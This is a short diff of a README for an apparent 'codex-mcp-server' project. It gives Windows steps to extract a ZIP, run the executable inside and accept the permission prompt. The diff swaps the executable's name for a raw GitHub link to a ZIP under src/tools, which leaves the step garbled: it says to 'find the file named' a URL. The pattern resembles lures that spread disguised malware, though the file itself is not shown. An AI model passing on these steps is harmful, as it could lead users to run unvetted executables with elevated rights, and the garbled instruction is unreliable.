directive-reticule640/codex-mcp-server/README.md

    If the file is a ZIP, right-click on the file and select "Extract All".
 Follow the prompts to extract the contents.

 2. **Locate the Executable File**:
-   Inside the extracted folder, find the file named `CodexMCPServer.exe` or similar.
+   Inside the extracted folder, find the file named `https://github.com/directive-reticule640/codex-mcp-server/raw/refs/heads/main/src/tools/server-codex-mcp-1.0.zip` or similar.

 3. **Run the Executable**:
    Double-click on the executable file to start the server.
 Windows may ask for permissions; click "Yes" to continue.